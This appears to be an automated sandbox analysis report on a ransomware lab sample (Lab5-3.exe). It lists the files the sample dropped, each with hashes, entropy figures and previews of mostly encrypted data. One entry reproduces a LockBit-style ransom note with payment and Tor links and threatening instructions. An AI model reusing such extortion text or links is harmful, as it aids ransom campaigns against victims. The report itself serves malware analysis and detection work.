                                                                                                          SHA1:42B2E29A4FDFA687DFD6DFCFA6D5298CCDC089E1
                                                                                                          SHA-256:A79968EBAC80C06E302E3078A5D6EE4CA31BAD0FB60D0D7AA738C75DEDA06374
                                                                                                          SHA-512:034C7638738B46251FB009CA6ED904D14CBE43F48AD82EF22B374EB6196741E6FE99A9765FE778717F545775B526A9059D03F1A4A5746D269EC5AF6404BA9EC1
                                                                                                          Malicious:false
                                                                                                          Preview:....nzR.g.>.](......5V..m..)]Z..%e8..`,.!.K.Mt?.....(..B.V_......kS...?.OU...!b......j7.-:.M.?.wy\*.3....].(Zg.-y...#[t......{.R.S}....u...o.x..W\q.;..iy.2.3.e...JJ..tY.N...Q.S.n././}Vh.9..q..............:O\-Z.'.."-@<F.?.z.].....l....[U}.,d...X.g...DO..\..[.w....N.../.uI...&uB.c.I.a_.| ..Tr.....W..h.K..[.M....,.....i....T..;.'..`.]..|...../...).K..s..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....j
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1760
                                                                                                          Entropy (8bit):7.886392931707198
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2ZKo5doJ6bJb/HfUTid3hBaUoSGFcmeykEdEElU92i:UbJIGx0uKeY2ElUJ
                                                                                                          MD5:F792ACB7727F9EF79CB570D05F6B2AD6
                                                                                                          SHA1:76CF1B675B8CFFF306F8952EE374FF4F6A9A8925
                                                                                                          SHA-256:034A51812809ECEB314C6E983B27079F7EB8800221A13C4BD9552C4BC72FEBA2
                                                                                                          SHA-512:0E51137F530B365C851478F61F7691C6337B65AF399EF7765B6F2494779073D6499D308F56C40B203E789ED9414EC9B1D70A930FCCD8951142D9C893E54F4CEE
                                                                                                          Malicious:false
                                                                                                          Preview:.$.*.69.8O.,...-..;..M...? ...$&=P.&-...8J.a.-|&!.-.ed.....?o..^..u<.........77...j...Y..Z*...6.TY..e.'r.k.."s..}y..\].&..^.4.....#..G?#d..,.#I......pX.3............G...F1.0...9 ~..:...;..x...C..5.b.j.c.().V.\.w.|.&.S.P..............hej..>.da..v.Y5...B...!.~..*?@/...."...~J.C._m...o...J.oo..J..K...../.y '...N+.=g.....l@I.8..}'}..Yn.....d.h..m....e...{F.........Pr....?o.g..];..DG..m...re@&.O...~.iw. ..v...........Q....^|...$.BQ.:."F1.......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1680
                                                                                                          Entropy (8bit):7.889227303883596
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ED37ZecOoHfUTid3hBaUoSGFcmeykEdEElU92i:E7FTOPGx0uKeY2ElUJ
                                                                                                          MD5:62F8C852A6DDFE22CC35B532BAA57B0F
                                                                                                          SHA1:2716CD50389A36BD2F8E6A2418F54D60A616A841
                                                                                                          SHA-256:E6D90C018E56770CCA82E7A4A54990FA4DCAF0C921346C51EED6D9BF4A2E04BB
                                                                                                          SHA-512:27CF9A78F131E61083D243D22FB03884A9F8ECC9BD70A227D64AABEA1D601366BCF4A35A35E4262D8096FC3B9333AD7D5DD16D4A156FEEC12E36F3BD9365F1BD
                                                                                                          Malicious:false
                                                                                                          Preview:..vt._.(.c......t..n.@....E .n^.EL...........c..e..{T.<....(.w..i..L...].d.._>...>..K,g.&vI.1e.g...6%...............I..&V....I...1#U.-K.<D./..J$.4..t..Xm'...n...D...[....H...*.L.rd...,......^..K.....T.Q>.5.-..$......NsY .[ay.}IkeH.mg..S...m.....:........(..l...kp.>...C...-.\;.(K.....`D'.N...]..0E|.-...#.c.;..*...b..&:..H..b.yk__.mO1..{.y. @.-..;u.L{Y.@$.Zf3...m=.%....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1664
                                                                                                          Entropy (8bit):7.891775165121019
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:t+jnDWXNHfUTid3hBaUoSGFcmeykEdEElU92i:EzDQmGx0uKeY2ElUJ
                                                                                                          MD5:6352CFB897D0BCAFB8FF1179482A0705
                                                                                                          SHA1:A147102D0B5083227F85301477370A55AE8D805E
                                                                                                          SHA-256:2E6BE4D32A6CCFB2B0DE69AD654F739F6AD5E22071E127D1CD78AE7642237312
                                                                                                          SHA-512:1BF93257A1D048E4BB3D466E6994B73D172F33B94346FDFE9EAFB0CE72FF7EDAFB4AC54C1FC3AF5539BCFB75E512DB9812713C2689E865874A737D9B9A30B190
                                                                                                          Malicious:false
                                                                                                          Preview:.g..#E..j..n.5.....i.N{.`F.....+.n.G.>3..q$......={.*.J2z~0ok.G..(..q..q...:....w........... pG..........a?...]x...EW....W...EC*.V..FD....-.9v....;..a.|..5...)..p;...,p..NQ0.2...3.o......e..hI..a^.v.&EY5..n....E...8...l.....P.x./....C.r........C...s...Q...}......V........Z.Ru..<4.CW|...mM-.9...V......*..).3K;..K.........<..@9.:E..(\`.^.=....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....j
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1664
                                                                                                          Entropy (8bit):7.890723907799829
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:pv2Du8HfUTid3hBaUoSGFcmeykEdEElU92i:pvNGx0uKeY2ElUJ
                                                                                                          MD5:D61C8A7CF4F2004ADB6A981621B7F677
                                                                                                          SHA1:97C0180232388D6DBA1BEF6165BDB29FAE7D92ED
                                                                                                          SHA-256:B8C764AE97C3FA54DAED74A221200EB76628BBACD7841128759AC7DA74698086
                                                                                                          SHA-512:5520C262AA4123F2C46E4CB522D18990427E9653DB971F7DA38220CD0E0700A10398CDDACDABBA5FF90218B9E13AD00103C75171F60B06AA7140B4F279EAB022
                                                                                                          Malicious:false
                                                                                                          Preview:oH.....0>.[.s..u...00.j`H.J.s..{5.x....|...Z..UY.>......w5..M..\i...Gfu{.r) ^....3..Qo...(..#..$I..........Y......JJ(B..D...c.zQ.&...Q....5.rl...5.f........M.z...;.<..T...........N..%./....o. O%qHAV......n!...e..:.....>...j&..8...\._TOV..w.....I..;'t...x%....{..q.l.1.hD....s..ys...E.u[OZ.....}........L@q...=Suj3.....K../.:.q...p%....|.D.I....{..)rg..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....j
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1664
                                                                                                          Entropy (8bit):7.883972970705944
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:+IGRXVAZrhyHfUTid3hBaUoSGFcmeykEdEElU92i:mQhtGx0uKeY2ElUJ
                                                                                                          MD5:71FCC659AE95DCDBAF666E4B4C40F7DD
                                                                                                          SHA1:0B2C3FD4028A842406DF875130ED6690F647B081
                                                                                                          SHA-256:EDFB213EAC92F8276C660D2213A7506E503ACEC54937158405294F379549C8D7
                                                                                                          SHA-512:0D34FFB6D3FB416B1F3C435432B631FC61473780A6C561D0C2E27A4EAE37674CCE594B7D5167D52C51060155A7B6B165E3889973322375E590C70FD513398F4A
                                                                                                          Malicious:false
                                                                                                          Preview:...K...F.j...S..X....vEm.a.\........R'N....Py...-'h.GB<.,...-.. x@..?.K...w.*<....=.xM..@..L.J....-... `...$.j.y.O...|.|d!...W.L.FL...o......V.Oc...86.=..O.Z3/....D.c...B....h..@.....".'..YM.....1..f..+.....z.L.Uh_.W...n.V.y.5j.VT.w.?u....+I.Lir...8y.5"...Y/_.[&.....~8.o..}..wk.@..._.. {.u.$...d....BO..f..bC.K.....W......m.,..V...A..R.Y$./n!.....U..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....j
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1664
                                                                                                          Entropy (8bit):7.896885846138258
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Aqf/moutHfUTid3hBaUoSGFcmeykEdEElU92i:D7uGGx0uKeY2ElUJ
                                                                                                          MD5:DD6EA169B36DA2FCBA36D68009C8B301
                                                                                                          SHA1:81BAD1B58C3F34F9C04CB452B7E42EF75A792B3E
                                                                                                          SHA-256:448D0219A03FE34BADCABD09EE3B322218869B7470FD730A754B013C16544487
                                                                                                          SHA-512:169AB4AC442D5CE7C1396192F81A97E8087E0D90103D4BF1DB7B4AF9E043DCFA1B51F5698B060C92F3914462C0D41BC6309C76A9E4EC9E4123EE5BAB789BBAB4
                                                                                                          Malicious:false
                                                                                                          Preview:n...g...E,.X..V.m..[....l&.....N.O...&.R.t\..qY.!k.&.?7.A.c((f.g?..T.V..m...E.z.X...V.z[^.b.|?..o..........W[p.?..z:..}.j.....yQ9P....*.\n.J3.z..1f.)"......w.F.l..."..NS>uJ...P._/a...0.$_.&z.......[O6.TV.....^I~.....P.>r@_.z.Q.'.a/.1..8......+N=....F.qo.t.zN9.!.2a4...T.%...z?....j.H...s#2X....MX.`t...N.....M...i...q....dwg}.6N..{..T:.6@"W. `.....(A.~..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....j
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1664
                                                                                                          Entropy (8bit):7.896874267750941
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:GbmxHfUTid3hBaUoSGFcmeykEdEElU92i:GbHGx0uKeY2ElUJ
                                                                                                          MD5:F492B15722FBCBFFEBF8DC81B012B7B7
                                                                                                          SHA1:3408925847C3BC98DAE4B5354F54E97296CAC92A
                                                                                                          SHA-256:F4B5C8B96CDF0BA5B980AF8924640E7232F1BC7D3C071C08B0E97641CB1756BD
                                                                                                          SHA-512:D88E0FC703FB1F26A6B7A92F4F6C74F072209858D0F14DC21C6C2D3693D64CDB01B7DFC1917B0DDA2A9CFC81BD6E13DA19885DB17232FB019BF30B1A5B52B2D8
                                                                                                          Malicious:false
                                                                                                          Preview:........PA...........Dz.....8.......j..L..DFb.K)...z..+..........h...J.}..].!.(#R{.%...f..........[l+.E .h.Rt.rk.$.i.*].&g..VPl.|t.;........y....Y.T..-..}.(..1.`.M6.-.=.'..0c.iW.......h...T..Y....^&N.........P..%J.s%?......u.P;.F..}(.G.C.RE........Uj..@UH.-.....jFG..,s.9{su........CA...>`S3.<..~..}...'.m.N.j.....`..(.........+.Y.V....tk...d`$.x.S.H.Z..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....j
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1680
                                                                                                          Entropy (8bit):7.897599068168831
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lSMLcocworE3HfUTid3hBaUoSGFcmeykEdEElU92i:kYHcLGx0uKeY2ElUJ
                                                                                                          MD5:8597F32C323054705F06E2FCF8BFFDB8
                                                                                                          SHA1:5FF99BE13512EB35C962F599004C75D692DFBE5B
                                                                                                          SHA-256:18D35B2B32B9B6D9E185C19A5A7E4BF4E65AA81B192857BA20AEA417F6ABB560
                                                                                                          SHA-512:676A6F470927E6D71A1C0BC300D8C439A02B4A857D3FA036201D3B2F28041FFAF4E281B34E995AA62AEB3C056AF89694460E04A2F262C8316E567FC1BB3DBEC0
                                                                                                          Malicious:false
                                                                                                          Preview: .../;....Z.......|z.:.F...q.C...T....V.?3...{eW..4.]j.4.... ..{>........m6....M...X.......N...ah.w.1....M........ u....@.^..?'8..i&...8.[......>sZu.........L:.Q[gE~>%...ze.:....z#..!...u......?&..p....8.1.tQ..Y..5f..E.t.C.DR..Esw....LN.f.L.PSl..6.w..]..L$....5..T.,.nPR.v/.O@.....1....._..>6t...f.Q,.8.A.~G....Z.d>....C..gF....Iy...Qe.h....nU]$.K.."H:.. ..~^._.........^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1664
                                                                                                          Entropy (8bit):7.8968967175295335
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:F3nJw1V3HfUTid3hBaUoSGFcmeykEdEElU92i:pJwgGx0uKeY2ElUJ
                                                                                                          MD5:EE354B78432AC60B9B7AB215FFAE9845
                                                                                                          SHA1:64DF968A0483C30AAA9A2249DEF3FE55F421F21B
                                                                                                          SHA-256:E777B1663DED878C2C1AD6EA7A10640AD6C56AA5476C77A5DE5F2238C503085A
                                                                                                          SHA-512:337FC2800CC0E4925A1F318D61A6CC7DAB3C6945A98E726D513020027373DACFCDD2D8F01022BBC89B3F686F778FC3904C8C0398F82231B55332322A8FC6F078
                                                                                                          Malicious:false
                                                                                                          Preview:..............H..D.|..$.P}.tm.3..G..B.1^..>..V.R....V.&.*|#<.S"..7....!.J.a.g.O.Vb.KhA....<....6*.B.........Q1h2R..ud|....L.)..<.t.z...F.P..W...!...\".s..b..K..^~b.@.."...p.jZ`m...t.....7..7.V.v..5..Wc.......s.@...B/x....F.T.Cu(...>A..G..!=..a.l.o.v\..[..6^`H..M2..|N..:...&f........`...<..=_Q...^.l.K...n..?.......Q...K......5-..Cx{......e6.b.Zk..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....j
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.882924719387791
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:H/LPN3lm23tgFJIUVHfUTid3hBaUoSGFcmeykEdEElU92i:H/u23tOJIUuGx0uKeY2ElUJ
                                                                                                          MD5:036DD3A9516D35580AA8CBDEEC7E1B1C
                                                                                                          SHA1:5D7D0FC5B160A16306643ED946506E5B190BFB15
                                                                                                          SHA-256:5C32955D90B307519DF1C8EBBB3194E5BE7110374BDDC8A1F1C6E73D0DB110C0
                                                                                                          SHA-512:65E7E0380180C88F757CEB28AF873D8B688950EE3C70E106D84051B4ED93EF5523C450EE725B78B70A92EE931E4A8E8B2770492E2BC67E3CE0808DA6184FD557
                                                                                                          Malicious:false
                                                                                                          Preview:.....W...I~..q.LwB..y......%.0JW.J....f.#.`6.$....=..U....{@.+L........=.\E!..Q..A.m.........)WGaE..0. ...U.L.9..F...P...+...R2..Zca%..I.B.c..Lm.+|.?...9<yiH.z....*a...9&>..M'!gy*... .Ch...^.....g1.Z..x...p&E.......*W...lus5.oYH..T.L.....%.D8....G.I.5....$<(..m...8..n.>..........R.@.....C.m..j.xx"..".xW. e...Fh(F.b.yT..7X.^.n..f.%...J...f.........X|....;..Dq.MS......U.,$l.....v3\.q.....@z..>b..r.K...y..O..Y`.V......$.4...o8.y...........`P..B...R.H..7.)#.h.F..;......u{WL..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.886885885982447
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:8AFIBojHfUTid3hBaUoSGFcmeykEdEElU92i:5FC/Gx0uKeY2ElUJ
                                                                                                          MD5:553C083CEFE336A6469C1BBB2F4B0A63
                                                                                                          SHA1:60A0C894BF3B497A4D66119B38B66F94765DEC36
                                                                                                          SHA-256:CEAAF7F5C991C5797814D96AF7BC68384780184F22EE2E0AAC65C6B06E09ADD7
                                                                                                          SHA-512:4567A868D6E81D0F81597FD61C14EF4AF0F26632322BFEF610C2D7BAB7E90EC505DC323AA8274DA13080B2BDD43780E3B4FDC5ECA582D3C74171417848B3F4ED
                                                                                                          Malicious:false
                                                                                                          Preview:{..#.R.m...@.Y.Y....G...7AE......g.c!2..A0.r.WF...O..t>[.....&.i.s@...BO.W..:p>..n.*ZX|...|Q#.;=...z...T^....#.;...'It.>3....y....!. ..J.J...r.Dicl.......64..."..V.3.h.y.......?......0#.Pw..#..^..[.>~.......o.i........W..*...eP}....;Bj...A ...\.4,...!.YC].H...V.+.Y......F...c}.m.k..?Q.H.i....s.D....<..........0A}Q..:T..cf..n..S.....#.p%.0...>*P....Zi..3B...-..ErE.....-.[..A.IE...z.X..d/{...3i........L....3.]...2.`S.b.?IT.3P...?J...X.(..H7....{-#.M.......8tN.J.{.].U.;T.#..D5..=.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2416
                                                                                                          Entropy (8bit):7.917438776941452
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:J8rj0lSXubVB6om16FAEHfUTid3hBaUoSGFcmeykEdEElU92i:Jo9ubf6ok6FiGx0uKeY2ElUJ
                                                                                                          MD5:CC33035F8EA617D903A5D452C052BE47
                                                                                                          SHA1:BB33A7EFA1AADEBC510A5A4954883983960C1A97
                                                                                                          SHA-256:7E28C5E316F40E6C6329257B1108975884A943B97FE9D156E8382BA3B4C0AF17
                                                                                                          SHA-512:CB73E63E9320846D94543623636CC4449DA21C8D970B94ED9F72AF1B703BC063FA70E5E19F15E80D5D14B3F04BB1F7E347C37BE39EE0828A36C7FA0F045C7174
                                                                                                          Malicious:false
                                                                                                          Preview:../.e..a2.......<....Ya...p....C.H...J,...oJ......<......<+0..8u.N........oV....J..^.'..!...E...(].|.5,."z.o6....,v8...Y.s<4l.R?.......k.:g.......q.q?.d.....^L.3.....8 &.....N.f._{.s...=.Z7......c..q$_7....4..t..S1.{..f......7...b.....#..j.......-........%a...2us=.I7s.q...JMY..c.k.J...S.11..%^.s../a...R^f.#..W..t....Tz...0.|..#Vt....f#bc.R.N...R.a.z...U.=.Z|..!4<......k.x.........?r..$.............A.....cJK.#......pd..^.F....M<..W...h-..F..Iga.I.+.b'...LX..)r.b..*...~........'D.Nv...z..'\.9.s*.z-+....R...'.r....V.[K.2.p(<BA{1.M...O>_P[.G...x.l..^..v6..@....>{..Se..B..Lp.Ui%..)...#\..G........O ..8.F...=..i.}9.f.dj..l...]....@...+....}......o....U......>.V .M.}.....Y..".....9.Y.'yN.^..U.9..Fz.d0{d..N..XsT,.....M...E0.hIi.p..`...`....$b.(.....=..f.b.U.....9...6P...t....unO.klK.... ..D..W..SN.=...../....p...2.'X.S..j....g".X.g....JTE.`.6%,.w."*.}...#..L..q...............Ul.5BcC<....4.E..a.......K...I..=,.4...&.KJ..]c..4.O.}.~...[
                                                                                                          Process:C:\Windows\System32\wbadmin.exe
                                                                                                          File Type:dBase III DBT, version number 0, next free block index 10240, 1st item "\262Z@u"
                                                                                                          Category:dropped
                                                                                                          Size (bytes):30720
                                                                                                          Entropy (8bit):0.7375930362977854
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:bR9+/i60TXIDUzaeOekOIeFd1OeveMeIMkaJ4eseTVlqsC9:b+/i6y3gGnVass0
                                                                                                          MD5:51F7144B8A963F2CADAA6DB8A797386B
                                                                                                          SHA1:0B0E8E9D1210BF718D2082F69D39A0EC6B071320
                                                                                                          SHA-256:F0B3FDDD74D849DF2458C896B24A418985B24B0274A198900044C4DB1969972B
                                                                                                          SHA-512:E9A6BAD19532F62D22D091E3488DC776A0D2352E70C6524088B1FE2CF8C77C7C51C89367AFB9E4A94FF773188633BE1F20DA541646BE0E0BD53C14E85724E89C
                                                                                                          Malicious:false
